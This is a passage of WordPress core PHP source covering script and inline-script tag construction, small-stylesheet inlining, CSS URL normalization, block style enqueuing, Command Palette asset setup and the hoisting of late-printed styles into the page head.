if ( ! isset( $attributes['type'] ) && ! is_admin() && ! current_theme_supports( 'html5', 'script' ) ) {
// Keep the type attribute as the first for legacy reasons (it has always been this way in core).
$attributes = array_merge(
array( 'type' => 'text/javascript' ),
$attributes
);
}
/**
* Filters attributes to be added to a script tag.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* Only the attribute name is added to the `<script>` tag for
* entries with a boolean value, and that are true.
*/
$attributes = apply_filters( 'wp_script_attributes', $attributes );
return sprintf( "<script%s></script>\n", wp_sanitize_script_attributes( $attributes ) );
}
/**
* Prints formatted `<script>` loader tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
*/
function wp_print_script_tag( $attributes ) {
echo wp_get_script_tag( $attributes );
}
/**
* Constructs an inline script tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_inline_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param string $data Data for script tag: JavaScript, importmap, speculationrules, etc.
* @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes.
* @return string String containing inline JavaScript code wrapped around `<script>` tag.
*/
function wp_get_inline_script_tag( $data, $attributes = array() ) {
$is_html5 = current_theme_supports( 'html5', 'script' ) || is_admin();
if ( ! isset( $attributes['type'] ) && ! $is_html5 ) {
// Keep the type attribute as the first for legacy reasons (it has always been this way in core).
$attributes = array_merge(
array( 'type' => 'text/javascript' ),
$attributes
);
}
/*
* XHTML extracts the contents of the SCRIPT element and then the XML parser
* decodes character references and other syntax elements. This can lead to
* misinterpretation of the script contents or invalid XHTML documents.
*
* Wrapping the contents in a CDATA section instructs the XML parser not to
* transform the contents of the SCRIPT element before passing them to the
* JavaScript engine.
*
* Example:
*
* <script>console.log('…');</script>
*
* In an HTML document this would print "…" to the console,
* but in an XHTML document it would print "…" to the console.
*
* <script>console.log('An image is <img> in HTML');</script>
*
* In an HTML document this would print "An image is <img> in HTML",
* but it's an invalid XHTML document because it interprets the `<img>`
* as an empty tag missing its closing `/`.
*
* @see https://www.w3.org/TR/xhtml1/#h-4.8
*/
if (
! $is_html5 &&
(
! isset( $attributes['type'] ) ||
'module' === $attributes['type'] ||
str_contains( $attributes['type'], 'javascript' ) ||
str_contains( $attributes['type'], 'ecmascript' ) ||
str_contains( $attributes['type'], 'jscript' ) ||
str_contains( $attributes['type'], 'livescript' )
)
) {
/*
* If the string `]]>` exists within the JavaScript it would break
* out of any wrapping CDATA section added here, so to start, it's
* necessary to escape that sequence which requires splitting the
* content into two CDATA sections wherever it's found.
*
* Note: it's only necessary to escape the closing `]]>` because
* an additional `<![CDATA[` leaves the contents unchanged.
*/
$data = str_replace( ']]>', ']]]]><![CDATA[>', $data );
// Wrap the entire escaped script inside a CDATA section.
$data = sprintf( "/* <![CDATA[ */\n%s\n/* ]]> */", $data );
}
$data = "\n" . trim( $data, "\n\r " ) . "\n";
/**
* Filters attributes to be added to a script tag.
*
* @since 5.7.0
*
* @param array $attributes Key-value pairs representing `<script>` tag attributes.
* Only the attribute name is added to the `<script>` tag for
* entries with a boolean value, and that are true.
* @param string $data Inline data.
*/
$attributes = apply_filters( 'wp_inline_script_attributes', $attributes, $data );
return sprintf( "<script%s>%s</script>\n", wp_sanitize_script_attributes( $attributes ), $data );
}
/**
* Prints an inline script tag.
*
* It is possible to inject attributes in the `<script>` tag via the {@see 'wp_inline_script_attributes'} filter.
* Automatically injects type attribute if needed.
*
* @since 5.7.0
*
* @param string $data Data for script tag: JavaScript, importmap, speculationrules, etc.
* @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes.
*/
function wp_print_inline_script_tag( $data, $attributes = array() ) {
echo wp_get_inline_script_tag( $data, $attributes );
}
/**
* Allows small styles to be inlined.
*
* This improves performance and sustainability, and is opt-in. Stylesheets can opt in
* by adding `path` data using `wp_style_add_data`, and defining the file's absolute path:
*
* wp_style_add_data( $style_handle, 'path', $file_path );
*
* @since 5.8.0
*
* @global WP_Styles $wp_styles
*/
function wp_maybe_inline_styles() {
global $wp_styles;
$total_inline_limit = 40000;
/**
* The maximum size of inlined styles in bytes.
*
* @since 5.8.0
* @since 6.9.0 The default limit increased from 20K to 40K.
*
* @param int $total_inline_limit The file-size threshold, in bytes. Default 40000.
*/
$total_inline_limit = apply_filters( 'styles_inline_size_limit', $total_inline_limit );
$styles = array();
// Build an array of styles that have a path defined.
foreach ( $wp_styles->queue as $handle ) {
if ( ! isset( $wp_styles->registered[ $handle ] ) ) {
continue;
}
$src = $wp_styles->registered[ $handle ]->src;
$path = $wp_styles->get_data( $handle, 'path' );
if ( $path && $src ) {
$size = wp_filesize( $path );
if ( ! $size ) {
continue;
}
$styles[] = array(
'handle' => $handle,
'src' => $src,
'path' => $path,
'size' => $size,
);
}
}
if ( ! empty( $styles ) ) {
// Reorder styles array based on size.
usort(
$styles,
static function ( $a, $b ) {
return ( $a['size'] <= $b['size'] ) ? -1 : 1;
}
);
/*
* The total inlined size.
*
* On each iteration of the loop, if a style gets added inline the value of this var increases
* to reflect the total size of inlined styles.
*/
$total_inline_size = 0;
// Loop styles.
foreach ( $styles as $style ) {
// Size check. Since styles are ordered by size, we can break the loop.
if ( $total_inline_size + $style['size'] > $total_inline_limit ) {
break;
}
// Get the styles if we don't already have them.
$style['css'] = file_get_contents( $style['path'] );
/*
* Check if the style contains relative URLs that need to be modified.
* URLs relative to the stylesheet's path should be converted to relative to the site's root.
*/
$style['css'] = _wp_normalize_relative_css_links( $style['css'], $style['src'] );
// Keep track of the original `src` for the style that was inlined so that the `sourceURL` comment can be added.
$wp_styles->add_data( $style['handle'], 'inlined_src', $style['src'] );
// Set `src` to `false` and add styles inline.
$wp_styles->registered[ $style['handle'] ]->src = false;
if ( empty( $wp_styles->registered[ $style['handle'] ]->extra['after'] ) ) {
$wp_styles->registered[ $style['handle'] ]->extra['after'] = array();
}
array_unshift( $wp_styles->registered[ $style['handle'] ]->extra['after'], $style['css'] );
// Add the styles size to the $total_inline_size var.
$total_inline_size += (int) $style['size'];
}
}
}
/**
* Makes URLs relative to the WordPress installation.
*
* @since 5.9.0
* @access private
*
* @param string $css The CSS to make URLs relative to the WordPress installation.
* @param string $stylesheet_url The URL to the stylesheet.
*
* @return string The CSS with URLs made relative to the WordPress installation.
*/
function _wp_normalize_relative_css_links( $css, $stylesheet_url ) {
return preg_replace_callback(
'#(url\s*\(\s*[\'"]?\s*)([^\'"\)]+)#',
static function ( $matches ) use ( $stylesheet_url ) {
list( , $prefix, $url ) = $matches;
// Short-circuit if the URL does not require normalization.
if (
str_starts_with( $url, 'http:' ) ||
str_starts_with( $url, 'https:' ) ||
str_starts_with( $url, '/' ) ||
str_starts_with( $url, '#' ) ||
str_starts_with( $url, 'data:' )
) {
return $matches[0];
}
// Build the absolute URL.
$absolute_url = dirname( $stylesheet_url ) . '/' . $url;
$absolute_url = str_replace( '/./', '/', $absolute_url );
// Convert to URL related to the site root.
$url = wp_make_link_relative( $absolute_url );
return $prefix . $url;
},
$css
);
}
/**
* Function that enqueues the CSS Custom Properties coming from theme.json.
*
* @since 5.9.0
*/
function wp_enqueue_global_styles_css_custom_properties() {
wp_register_style( 'global-styles-css-custom-properties', false );
wp_add_inline_style( 'global-styles-css-custom-properties', wp_get_global_stylesheet( array( 'variables' ) ) );
wp_enqueue_style( 'global-styles-css-custom-properties' );
}
/**
* Hooks inline styles in the proper place, depending on the active theme.
*
* @since 5.9.1
* @since 6.1.0 Added the `$priority` parameter.
*
* For block themes, styles are loaded in the head.
* For classic ones, styles are loaded in the body because the wp_head action happens before render_block.
*
* @link https://core.trac.wordpress.org/ticket/53494.
*
* @param string $style String containing the CSS styles to be added.
* @param int $priority To set the priority for the add_action.
*/
function wp_enqueue_block_support_styles( $style, $priority = 10 ) {
$action_hook_name = 'wp_footer';
if ( wp_is_block_theme() ) {
$action_hook_name = 'wp_head';
}
add_action(
$action_hook_name,
static function () use ( $style ) {
echo "<style>$style</style>\n";
},
$priority
);
}
/**
* Fetches, processes and compiles stored core styles, then combines and renders them to the page.
* Styles are stored via the style engine API.
*
* @link https://developer.wordpress.org/block-editor/reference-guides/packages/packages-style-engine/
*
* @since 6.1.0
*
* @param array $options {
* Optional. An array of options to pass to wp_style_engine_get_stylesheet_from_context().
* Default empty array.
*
* @type bool $optimize Whether to optimize the CSS output, e.g., combine rules.
* Default false.
* @type bool $prettify Whether to add new lines and indents to output.
* Default to whether the `SCRIPT_DEBUG` constant is defined.
* }
*/
function wp_enqueue_stored_styles( $options = array() ) {
// Note: Styles printed at wp_footer for classic themes may still end up in the head due to wp_load_classic_theme_block_styles_on_demand().
$is_block_theme = wp_is_block_theme();
$is_classic_theme = ! $is_block_theme;
/*
* For block themes, this function prints stored styles in the header.
* For classic themes, in the footer.
*/
if (
( $is_block_theme && doing_action( 'wp_footer' ) ) ||
( $is_classic_theme && doing_action( 'wp_enqueue_scripts' ) )
) {
return;
}
$core_styles_keys = array( 'block-supports' );
$compiled_core_stylesheet = '';
$style_tag_id = 'core';
// Adds comment if code is prettified to identify core styles sections in debugging.
$should_prettify = isset( $options['prettify'] ) ? true === $options['prettify'] : defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG;
foreach ( $core_styles_keys as $style_key ) {
if ( $should_prettify ) {
$compiled_core_stylesheet .= "/**\n * Core styles: $style_key\n */\n";
}
// Chains core store ids to signify what the styles contain.
$style_tag_id .= '-' . $style_key;
$compiled_core_stylesheet .= wp_style_engine_get_stylesheet_from_context( $style_key, $options );
}
// Combines Core styles.
if ( ! empty( $compiled_core_stylesheet ) ) {
wp_register_style( $style_tag_id, false );
wp_add_inline_style( $style_tag_id, $compiled_core_stylesheet );
wp_enqueue_style( $style_tag_id );
}
// Prints out any other stores registered by themes or otherwise.
$additional_stores = WP_Style_Engine_CSS_Rules_Store::get_stores();
foreach ( array_keys( $additional_stores ) as $store_name ) {
if ( in_array( $store_name, $core_styles_keys, true ) ) {
continue;
}
$styles = wp_style_engine_get_stylesheet_from_context( $store_name, $options );
if ( ! empty( $styles ) ) {
$key = "wp-style-engine-$store_name";
wp_register_style( $key, false );
wp_add_inline_style( $key, $styles );
wp_enqueue_style( $key );
}
}
}
/**
* Enqueues a stylesheet for a specific block.
*
* If the theme has opted-in to load block styles on demand,
* then the stylesheet will be enqueued on-render,
* otherwise when the block inits.
*
* @since 5.9.0
*
* @param string $block_name The block-name, including namespace.
* @param array $args {
* An array of arguments. See wp_register_style() for full information about each argument.
*
* @type string $handle The handle for the stylesheet.
* @type string|false $src The source URL of the stylesheet.
* @type string[] $deps Array of registered stylesheet handles this stylesheet depends on.
* @type string|bool|null $ver Stylesheet version number.
* @type string $media The media for which this stylesheet has been defined.
* @type string|null $path Absolute path to the stylesheet, so that it can potentially be inlined.
* }
*/
function wp_enqueue_block_style( $block_name, $args ) {
$args = wp_parse_args(
$args,
array(
'handle' => '',
'src' => '',
'deps' => array(),
'ver' => false,
'media' => 'all',
)
);
/**
* Callback function to register and enqueue styles.
*
* @param string $content When the callback is used for the render_block filter,
* the content needs to be returned so the function parameter
* is to ensure the content exists.
* @return string Block content.
*/
$callback = static function ( $content ) use ( $args ) {
// Register the stylesheet.
if ( ! empty( $args['src'] ) ) {
wp_register_style( $args['handle'], $args['src'], $args['deps'], $args['ver'], $args['media'] );
}
// Add `path` data if provided.
if ( isset( $args['path'] ) ) {
wp_style_add_data( $args['handle'], 'path', $args['path'] );
// Get the RTL file path.
$rtl_file_path = str_replace( '.css', '-rtl.css', $args['path'] );
// Add RTL stylesheet.
if ( file_exists( $rtl_file_path ) ) {
wp_style_add_data( $args['handle'], 'rtl', 'replace' );
if ( is_rtl() ) {
wp_style_add_data( $args['handle'], 'path', $rtl_file_path );
}
}
}
// Enqueue the stylesheet.
wp_enqueue_style( $args['handle'] );
return $content;
};
$hook = did_action( 'wp_enqueue_scripts' ) ? 'wp_footer' : 'wp_enqueue_scripts';
if ( wp_should_load_block_assets_on_demand() ) {
/**
* Callback function to register and enqueue styles.
*
* @param string $content The block content.
* @param array $block The full block, including name and attributes.
* @return string Block content.
*/
$callback_separate = static function ( $content, $block ) use ( $block_name, $callback ) {
if ( ! empty( $block['blockName'] ) && $block_name === $block['blockName'] ) {
return $callback( $content );
}
return $content;
};
/*
* The filter's callback here is an anonymous function because
* using a named function in this case is not possible.
*
* The function cannot be unhooked, however, users are still able
* to dequeue the stylesheets registered/enqueued by the callback
* which is why in this case, using an anonymous function
* was deemed acceptable.
*/
add_filter( 'render_block', $callback_separate, 10, 2 );
return;
}
/*
* The filter's callback here is an anonymous function because
* using a named function in this case is not possible.
*
* The function cannot be unhooked, however, users are still able
* to dequeue the stylesheets registered/enqueued by the callback
* which is why in this case, using an anonymous function
* was deemed acceptable.
*/
add_filter( $hook, $callback );
// Enqueue assets in the editor.
add_action( 'enqueue_block_assets', $callback );
}
/**
* Loads classic theme styles on classic themes in the frontend.
*
* This is used for backwards compatibility for Button and File blocks specifically.
*
* @since 6.1.0
* @since 6.2.0 Added File block styles.
* @since 6.8.0 Moved stylesheet registration outside of this function.
*/
function wp_enqueue_classic_theme_styles() {
if ( ! wp_theme_has_theme_json() ) {
wp_enqueue_style( 'classic-theme-styles' );
}
}
/**
* Enqueues the assets required for the Command Palette.
*
* @since 6.9.0
*
* @global array $menu
* @global array $submenu
*/
function wp_enqueue_command_palette_assets() {
global $menu, $submenu;
$command_palette_settings = array(
'is_network_admin' => is_network_admin(),
);
if ( $menu ) {
$menu_commands = array();
foreach ( $menu as $menu_item ) {
if ( empty( $menu_item[0] ) || ! empty( $menu_item[1] ) && ! current_user_can( $menu_item[1] ) ) {
continue;
}
// Remove all HTML tags and their contents.
$menu_label = $menu_item[0];
while ( preg_match( '/<[^>]*>/', $menu_label ) ) {
$menu_label = preg_replace( '/<[^>]*>.*?<\/[^>]*>|<[^>]*\/>|<[^>]*>/s', '', $menu_label );
}
$menu_label = trim( $menu_label );
$menu_url = '';
$menu_slug = $menu_item[2];
if ( preg_match( '/\.php($|\?)/', $menu_slug ) || wp_http_validate_url( $menu_slug ) ) {
$menu_url = $menu_slug;
} elseif ( ! empty( menu_page_url( $menu_slug, false ) ) ) {
$menu_url = html_entity_decode( menu_page_url( $menu_slug, false ), ENT_QUOTES, get_bloginfo( 'charset' ) );
}
if ( $menu_url ) {
$menu_commands[] = array(
'label' => $menu_label,
'url' => $menu_url,
'name' => $menu_slug,
);
}
if ( array_key_exists( $menu_slug, $submenu ) ) {
foreach ( $submenu[ $menu_slug ] as $submenu_item ) {
if ( empty( $submenu_item[0] ) || ! empty( $submenu_item[1] ) && ! current_user_can( $submenu_item[1] ) ) {
continue;
}
// Remove all HTML tags and their contents.
$submenu_label = $submenu_item[0];
while ( preg_match( '/<[^>]*>/', $submenu_label ) ) {
$submenu_label = preg_replace( '/<[^>]*>.*?<\/[^>]*>|<[^>]*\/>|<[^>]*>/s', '', $submenu_label );
}
$submenu_label = trim( $submenu_label );
$submenu_url = '';
$submenu_slug = $submenu_item[2];
if ( preg_match( '/\.php($|\?)/', $submenu_slug ) || wp_http_validate_url( $submenu_slug ) ) {
$submenu_url = $submenu_slug;
} elseif ( ! empty( menu_page_url( $submenu_slug, false ) ) ) {
$submenu_url = html_entity_decode( menu_page_url( $submenu_slug, false ), ENT_QUOTES, get_bloginfo( 'charset' ) );
}
if ( $submenu_url ) {
$menu_commands[] = array(
'label' => sprintf(
/* translators: 1: Menu label, 2: Submenu label. */
__( '%1$s > %2$s' ),
$menu_label,
$submenu_label
),
'url' => $submenu_url,
'name' => $menu_slug . '-' . $submenu_item[2],
);
}
}
}
}
$command_palette_settings['menu_commands'] = $menu_commands;
}
wp_enqueue_script( 'wp-commands' );
wp_enqueue_style( 'wp-commands' );
wp_enqueue_script( 'wp-core-commands' );
wp_add_inline_script(
'wp-core-commands',
sprintf(
'wp.coreCommands.initializeCommandPalette( %s );',
wp_json_encode( $command_palette_settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
)
);
}
/**
* Removes leading and trailing _empty_ script tags.
*
* This is a helper meant to be used for literal script tag construction
* within `wp_get_inline_script_tag()` or `wp_print_inline_script_tag()`.
* It removes the literal values of "<script>" and "</script>" from
* around an inline script after trimming whitespace. Typically this
* is used in conjunction with output buffering, where `ob_get_clean()`
* is passed as the `$contents` argument.
*
* Example:
*
* // Strips exact literal empty SCRIPT tags.
* $js = '<script>sayHello();</script>;
* 'sayHello();' === wp_remove_surrounding_empty_script_tags( $js );
*
* // Otherwise if anything is different it warns in the JS console.
* $js = '<script type="text/javascript">console.log( "hi" );</script>';
* 'console.error( ... )' === wp_remove_surrounding_empty_script_tags( $js );
*
* @since 6.4.0
* @access private
*
* @see wp_print_inline_script_tag()
* @see wp_get_inline_script_tag()
*
* @param string $contents Script body with manually created SCRIPT tag literals.
* @return string Script body without surrounding script tag literals, or
* original contents if both exact literals aren't present.
*/
function wp_remove_surrounding_empty_script_tags( $contents ) {
$contents = trim( $contents );
$opener = '<SCRIPT>';
$closer = '</SCRIPT>';
if (
strlen( $contents ) > strlen( $opener ) + strlen( $closer ) &&
strtoupper( substr( $contents, 0, strlen( $opener ) ) ) === $opener &&
strtoupper( substr( $contents, -strlen( $closer ) ) ) === $closer
) {
return substr( $contents, strlen( $opener ), -strlen( $closer ) );
} else {
$error_message = __( 'Expected string to start with script tag (without attributes) and end with script tag, with optional whitespace.' );
_doing_it_wrong( __FUNCTION__, $error_message, '6.4' );
return sprintf(
'console.error(%s)',
wp_json_encode(
sprintf(
/* translators: %s: wp_remove_surrounding_empty_script_tags() */
__( 'Function %s used incorrectly in PHP.' ),
'wp_remove_surrounding_empty_script_tags()'
) . ' ' . $error_message
)
);
}
}
/**
* Adds hooks to load block styles on demand in classic themes.
*
* @since 6.9.0
*
* @see _add_default_theme_supports()
*/
function wp_load_classic_theme_block_styles_on_demand() {
// This is not relevant to block themes, as they are opted in to loading separate styles on demand via _add_default_theme_supports().
if ( wp_is_block_theme() ) {
return;
}
/*
* Make sure that wp_should_output_buffer_template_for_enhancement() returns true even if there aren't any
* `wp_template_enhancement_output_buffer` filters added, but do so at priority zero so that applications which
* wish to stream responses can more easily turn this off.
*/
add_filter( 'wp_should_output_buffer_template_for_enhancement', '__return_true', 0 );
// If a site has opted out of the template enhancement output buffer, then bail.
if ( ! wp_should_output_buffer_template_for_enhancement() ) {
return;
}
// The following two filters are added by default for block themes in _add_default_theme_supports().
/*
* Load separate block styles so that the large block-library stylesheet is not enqueued unconditionally, and so
* that block-specific styles will only be enqueued when they are used on the page. A priority of zero allows for
* this to be easily overridden by themes which wish to opt out. If a site has explicitly opted out of loading
* separate block styles, then abort.
*/
add_filter( 'should_load_separate_core_block_assets', '__return_true', 0 );
if ( ! wp_should_load_separate_core_block_assets() ) {
return;
}
/*
* Also ensure that block assets are loaded on demand (although the default value is from should_load_separate_core_block_assets).
* As above, a priority of zero allows for this to be easily overridden by themes which wish to opt out. If a site
* has explicitly opted out of loading block styles on demand, then abort.
*/
add_filter( 'should_load_block_assets_on_demand', '__return_true', 0 );
if ( ! wp_should_load_block_assets_on_demand() ) {
return;
}
// Add hooks which require the presence of the output buffer. Ideally the above two filters could be added here, but they run too early.
add_action( 'wp_template_enhancement_output_buffer_started', 'wp_hoist_late_printed_styles' );
}
/**
* Adds the hooks needed for CSS output to be delayed until after the content of the page has been established.
*
* @since 6.9.0
*
* @see wp_load_classic_theme_block_styles_on_demand()
* @see _wp_footer_scripts()
*/
function wp_hoist_late_printed_styles() {
// Skip the embed template on-demand styles aren't relevant, and there is no wp_head action.
if ( is_embed() ) {
return;
}
// Capture the styles enqueued at the enqueue_block_assets action, so that non-core block styles and global styles can be inserted afterwards during hoisting.
$style_handles_at_enqueue_block_assets = array();
add_action(
'enqueue_block_assets',
static function () use ( &$style_handles_at_enqueue_block_assets ) {
$style_handles_at_enqueue_block_assets = wp_styles()->queue;
},
PHP_INT_MIN
);
add_action(
'enqueue_block_assets',
static function () use ( &$style_handles_at_enqueue_block_assets ) {
$style_handles_at_enqueue_block_assets = array_values( array_diff( wp_styles()->queue, $style_handles_at_enqueue_block_assets ) );
},
PHP_INT_MAX
);
/*
* Add a placeholder comment into the inline styles for wp-block-library, after which the late block styles
* can be hoisted from the footer to be printed in the header by means of a filter below on the template enhancement
* output buffer. The `wp_print_styles` action is used to ensure that if the inline style gets replaced at
* `enqueue_block_assets` or `wp_enqueue_scripts` that the placeholder will be sure to be present.
*/
$placeholder = sprintf( '/*%s*/', uniqid( 'wp_block_styles_on_demand_placeholder:' ) );
add_action(
'wp_print_styles',
static function () use ( $placeholder ) {
wp_add_inline_style( 'wp-block-library', $placeholder );
}
);
/*
* Create a substitute for `print_late_styles()` which is aware of block styles. This substitute does not print
* the styles, but it captures what would be printed for block styles and non-block styles so that they can be
* later hoisted to the HEAD in the template enhancement output buffer. This will run at `wp_print_footer_scripts`
* before `print_footer_scripts()` is called.
*/
$printed_core_block_styles = '';
$printed_other_block_styles = '';
$printed_global_styles = '';
$printed_late_styles = '';
$capture_late_styles = static function () use ( &$printed_core_block_styles, &$printed_other_block_styles, &$printed_global_styles, &$printed_late_styles ) {
// Gather the styles related to on-demand block enqueues.
$all_core_block_style_handles = array();
$all_other_block_style_handles = array();
foreach ( WP_Block_Type_Registry::get_instance()->get_all_registered() as $block_type ) {
if ( str_starts_with( $block_type->name, 'core/' ) ) {
foreach ( $block_type->style_handles as $style_handle ) {
$all_core_block_style_handles[] = $style_handle;
}
} else {
foreach ( $block_type->style_handles as $style_handle ) {
$all_other_block_style_handles[] = $style_handle;
}
}
}
/*
* First print all styles related to blocks which should be inserted right after the wp-block-library stylesheet
* to preserve the CSS cascade. The logic in this `if` statement is derived from `wp_print_styles()`.
*/
$enqueued_core_block_styles = array_values( array_intersect( $all_core_block_style_handles, wp_styles()->queue ) );
if ( count( $enqueued_core_block_styles ) > 0 ) {
ob_start();
wp_styles()->do_items( $enqueued_core_block_styles );
$printed_core_block_styles = ob_get_clean();
}
// Non-core block styles get printed after the classic-theme-styles stylesheet.
$enqueued_other_block_styles = array_values( array_intersect( $all_other_block_style_handles, wp_styles()->queue ) );
if ( count( $enqueued_other_block_styles ) > 0 ) {
ob_start();
wp_styles()->do_items( $enqueued_other_block_styles );
$printed_other_block_styles = ob_get_clean();
}
// Capture the global-styles so that it can be printed separately after classic-theme-styles and other styles enqueued at enqueue_block_assets.
if ( wp_style_is( 'global-styles' ) ) {
ob_start();
wp_styles()->do_items( array( 'global-styles' ) );
$printed_global_styles = ob_get_clean();
}
/*
* Print all remaining styles not related to blocks. This contains a subset of the logic from
* `print_late_styles()`, without admin-specific logic and the `print_late_styles` filter to control whether
* late styles are printed (since they are being hoisted anyway).
*/
ob_start();
wp_styles()->do_footer_items();
$printed_late_styles = ob_get_clean();
};
/*
* If `_wp_footer_scripts()` was unhooked from the `wp_print_footer_scripts` action, or if `wp_print_footer_scripts()`
* was unhooked from running at the `wp_footer` action, then only add a callback to `wp_footer` which will capture the
* late-printed styles.
*
* Otherwise, in the normal case where `_wp_footer_scripts()` will run at the `wp_print_footer_scripts` action, then
* swap out `_wp_footer_scripts()` with an alternative which captures the printed styles (for hoisting to HEAD) before
* proceeding with printing the footer scripts.
*/
$wp_print_footer_scripts_priority = has_action( 'wp_print_footer_scripts', '_wp_footer_scripts' );
if ( false === $wp_print_footer_scripts_priority || false === has_action( 'wp_footer', 'wp_print_footer_scripts' ) ) {
// The normal priority for wp_print_footer_scripts() is to run at 20.
add_action( 'wp_footer', $capture_late_styles, 20 );
} else {
remove_action( 'wp_print_footer_scripts', '_wp_footer_scripts', $wp_print_footer_scripts_priority );
add_action(
'wp_print_footer_scripts',
static function () use ( $capture_late_styles ) {
$capture_late_styles();
print_footer_scripts();
},
$wp_print_footer_scripts_priority
);
}
// Replace placeholder with the captured late styles.
add_filter(
'wp_template_enhancement_output_buffer',
static function ( $buffer ) use ( $placeholder, &$style_handles_at_enqueue_block_assets, &$printed_core_block_styles, &$printed_other_block_styles, &$printed_global_styles, &$printed_late_styles ) {
// Anonymous subclass of WP_HTML_Tag_Processor which exposes underlying bookmark spans.
$processor = new class( $buffer ) extends WP_HTML_Tag_Processor {
/**
* Gets the span for the current token.
*
* @return WP_HTML_Span Current token span.
*/
private function get_span(): WP_HTML_Span {
// Note: This call will never fail according to the usage of this class, given it is always called after ::next_tag() is true.
$this->set_bookmark( 'here' );
return $this->bookmarks['here'];
}
/**
* Inserts text before the current token.
*
* @param string $text Text to insert.
*/
public function insert_before( string $text ) {
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $this->get_span()->start, 0, $text );
}
/**
* Inserts text after the current token.
*
* @param string $text Text to insert.
*/
public function insert_after( string $text ) {
$span = $this->get_span();
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $span->start + $span->length, 0, $text );
}
/**
* Removes the current token.
*/
public function remove() {
$span = $this->get_span();
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $span->start, $span->length, '' );
}
};
// Locate the insertion points in the HEAD.
while ( $processor->next_tag( array( 'tag_closers' => 'visit' ) ) ) {
if (
'STYLE' === $processor->get_tag() &&
'wp-block-library-inline-css' === $processor->get_attribute( 'id' )
) {
$processor->set_bookmark( 'wp_block_library' );
} elseif ( 'HEAD' === $processor->get_tag() && $processor->is_tag_closer() ) {
$processor->set_bookmark( 'head_end' );
break;
} elseif ( ( 'STYLE' === $processor->get_tag() || 'LINK' === $processor->get_tag() ) && $processor->get_attribute( 'id' ) ) {
$id = $processor->get_attribute( 'id' );
$handle = null;
if ( 'STYLE' === $processor->get_tag() ) {
if ( preg_match( '/^(.+)-inline-css$/', $id, $matches ) ) {
$handle = $matches[1];
}
} elseif ( preg_match( '/^(.+)-css$/', $id, $matches ) ) {
$handle = $matches[1];
}
if ( 'classic-theme-styles' === $handle ) {
$processor->set_bookmark( 'classic_theme_styles' );
}
if ( $handle && in_array( $handle, $style_handles_at_enqueue_block_assets, true ) ) {
if ( ! $processor->has_bookmark( 'first_style_at_enqueue_block_assets' ) ) {
$processor->set_bookmark( 'first_style_at_enqueue_block_assets' );
}
$processor->set_bookmark( 'last_style_at_enqueue_block_assets' );
}
}
}
/*
* Insert block styles right after wp-block-library (if it is present). The placeholder CSS comment will
* always be added to the wp-block-library inline style since it gets printed at `wp_head` before the blocks
* are rendered. This means that there may not actually be any block styles to hoist from the footer to
* insert after this inline style. The placeholder CSS comment needs to be added so that the inline style
* gets printed, but if the resulting inline style is empty after the placeholder is removed, then the
* inline style is removed.
*/
if ( $processor->has_bookmark( 'wp_block_library' ) ) {
$processor->seek( 'wp_block_library' );
$css_text = $processor->get_modifiable_text();
/*
* A placeholder CSS comment is added to the inline style in order to force an inline STYLE tag to
* be printed. Now that we've located the inline style, the placeholder comment can be removed. If
* there is no CSS left in the STYLE tag after removing the placeholder (aside from the sourceURL
* comment), then remove the STYLE entirely.
*/
$css_text = str_replace( $placeholder, '', $css_text );
if ( preg_match( ':^/\*# sourceURL=\S+? \*/$:', trim( $css_text ) ) ) {
$processor->remove();
} else {
$processor->set_modifiable_text( $css_text );
}
$inserted_after = $printed_core_block_styles;
$printed_core_block_styles = '';
// If the classic-theme-styles is absent, then the third-party block styles cannot be inserted after it, so they get inserted here.
if ( ! $processor->has_bookmark( 'classic_theme_styles' ) ) {
if ( '' !== $printed_other_block_styles ) {
$inserted_after .= $printed_other_block_styles;
}
$printed_other_block_styles = '';
// If there aren't any other styles printed at enqueue_block_assets either, then the global styles need to also be printed here.
if ( ! $processor->has_bookmark( 'last_style_at_enqueue_block_assets' ) ) {
if ( '' !== $printed_global_styles ) {
$inserted_after .= $printed_global_styles;
}
$printed_global_styles = '';
}
}
if ( '' !== $inserted_after ) {
$processor->insert_after( "\n" . $inserted_after );
}
}
// Insert global-styles after the styles enqueued at enqueue_block_assets.
if ( '' !== $printed_global_styles && $processor->has_bookmark( 'last_style_at_enqueue_block_assets' ) ) {
$processor->seek( 'last_style_at_enqueue_block_assets' );
$processor->insert_after( "\n" . $printed_global_styles );
$printed_global_styles = '';
if ( ! $processor->has_bookmark( 'classic_theme_styles' ) && '' !== $printed_other_block_styles ) {
$processor->insert_after( "\n" . $printed_other_block_styles );
$printed_other_block_styles = '';
}
}
// Insert third-party block styles right after the classic-theme-styles.
if ( '' !== $printed_other_block_styles && $processor->has_bookmark( 'classic_theme_styles' ) ) {
$processor->seek( 'classic_theme_styles' );
$processor->insert_after( "\n" . $printed_other_block_styles );
$printed_other_block_styles = '';
}
// Print all remaining styles.
$remaining_styles = $printed_core_block_styles . $printed_other_block_styles . $printed_global_styles . $printed_late_styles;
if ( $remaining_styles && $processor->has_bookmark( 'head_end' ) ) {
$processor->seek( 'head_end' );
$processor->insert_before( $remaining_styles . "\n" );
}
return $processor->get_updated_html();
}
);
}
/**
* Return the corresponding JavaScript `dataset` name for an attribute
* if it represents a custom data attribute, or `null` if not.
*
* Custom data attributes appear in an element's `dataset` property in a
* browser, but there's a specific way the names are translated from HTML
* into JavaScript. This function indicates how the name would appear in
* JavaScript if a browser would recognize it as a custom data attribute.
*
* Example:
*
* // Dash-letter pairs turn into capital letters.
* 'postId' === wp_js_dataset_name( 'data-post-id' );
* 'Before' === wp_js_dataset_name( 'data--before' );
* '-One--Two---' === wp_js_dataset_name( 'data---one---two---' );
*
* // Not every attribute name will be interpreted as a custom data attribute.
* null === wp_js_dataset_name( 'post-id' );
* null === wp_js_dataset_name( 'data' );
*
* // Some very surprising names will; for example, a property whose name is the empty string.
* '' === wp_js_dataset_name( 'data-' );
